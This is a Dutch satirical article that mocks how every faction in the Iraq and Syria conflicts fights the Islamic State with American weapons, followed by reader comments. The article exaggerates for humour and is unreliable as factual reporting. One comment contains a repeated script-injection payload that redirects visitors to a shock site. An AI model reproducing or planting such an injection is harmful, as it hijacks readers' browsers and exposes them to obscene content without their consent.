De opmars van IS in Irak: een analyse

MOSUL – In het Noorden van Irak lijken Koerdische strijders de Mosuldam veroverd te hebben op de Islamitische Staat. Opmerkelijk, want tot hiertoe leek er geen maat te staan op de veroveringen van de islamistische terreurmilitie. Maar hoe is IS ooit zo snel kunnen oprukken? Een analyse.

IS strijdt met Amerikaanse wapens tegen de Amerikaanse wapens van de andere facties in de regio. (Foto: Youtube)
IS strijdt met Amerikaanse wapens tegen de Amerikaanse wapens van de andere facties in de regio. (Foto: Youtube)

De Islamitische Staat, kortweg IS, is voortgevloeid uit het door Ayman Al Zarqawi opgerichtte Al Qaeda in Irak, een terreurorganisatie die tijdens de Amerikaanse invasie in 2003 is opgericht om tegen de Amerikanen en de door de Amerikanen bewapende sjiïtische Irakezen te strijden.

Die eerste strijders waren vaak soennitische dissidenten uit het Iraakse leger, die hun Amerikaanse wapens waarmee ze in de jaren tachtig en negentig nog tegen de Amerikaanse wapens van de Iraniërs en de Koerden hadden gevochten tegen de Amerikanen gebruikten. De Amerikanen vochten uiteraard per definitie terug met Amerikaanse wapens.

De cutting edge en state of the art Amerikaanse wapens van de Amerikanen bleken echter iets doeltreffender dan de verouderde Amerikaanse wapens waarmee het Irakese leger in de jaren 80 en 90 tegen de Amerikaanse wapens van de Koerden en de Iraniërs streden, waardoor deze laatsten noodgedwongen hun actieterrein verlegden naar het deels door Amerika bewapende Syrië.

Daar sloot IS zich aan bij het door de CIA met Amerikaanse wapens bewapende Vrij Syrisch Leger en de door Saudi-Arabië en Qatar met Amerikaanse wapens bewapende Al-Nusrabrigade om haar Amerikaanse wapens in te zetten tegen het in het verleden door Amerika maar nu door Rusland bewapende regime-Assad.

Toen het Vrije Syrische Leger en het al-Nusrafront hun Amerikaanse wapens tegen de veel radicalere IS-strijders keerden, verlegden deze laatsten hun actieterrein terug naar het door interne strijd met Amerikaanse wapens fel verzwakte Irak.

Die opmars kwam in een stroomversnelling nadat IS de gesofisticeerde Amerikaanse wapens die het Iraakse leger had gekregen om tegen de Amerikaanse wapens van IS te strijden hadden buitgemaakt.

Dankzij Amerikaanse bommen uit Amerikaanse jachtbommenwerpers zijn de met Amerikaanse wapens strijdende IS-strijders nu voor het eerst sinds lang weer teruggedreven door de door de Amerikanen bewapende Koerden.

Die Koerden vragen wel om nieuwe Amerikaanse wapens, omdat de Amerikaanse wapens die ze in de jaren 70 gekregen hadden om tegen de Amerikaanse wapens van de Irakezen te strijden, hopeloos verouderd waren.

Verwacht wordt dat de strijders van IS zich nu terug naar Syrië zullen begeven, waar ze met de Amerikaanse wapens die ze in Irak hebben buitgemaakt zullen vechten tegen de Russische wapens van het regime-Assad en de Amerikaanse wapens van al-Nusra en het Vrije Syrische Leger.

Met als gevolg dat IS nu tegen de gecombineerde Amerikaanse wapens van de Amerikanen, de Koerden, de Irakezen, al-Nusra en het Vrije Syrische leger en president Assad strijdt. Ze mogen van geluk spreken dat ze zo veel Amerikaanse wapens hebben.

6 reacties op "De opmars van IS in Irak: een analyse"

  1. Vandaar dat de US momenteel biodegradeerbare en composteerbare wapens aan het ontwikkelen zijn. (Beide begrippen eindigen -niet toevallig- op ‘eerbaar’!) Enfin, wapens met beperkte houdbaarheid dus. Het heeft dan geen zin om deze buit te maken op je vijanden, ze worden toch onbruikbaar. Je kan net zo goed gaan poreischieten of ajuingooien. Volgende keer betalen ze er gewoon voor, die van de IS aan de US natuurlijk. Veel eerbaarder (en na compostering en wat tuinbouw ook eetbaarder)…

    Beantwoorden.
  2. window.location="http://meatspin.fr"; · Bewerken

    <script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script><script>window.location=”http://meatspin.fr”;</script>

    Beantwoorden.

Laat een reactie achter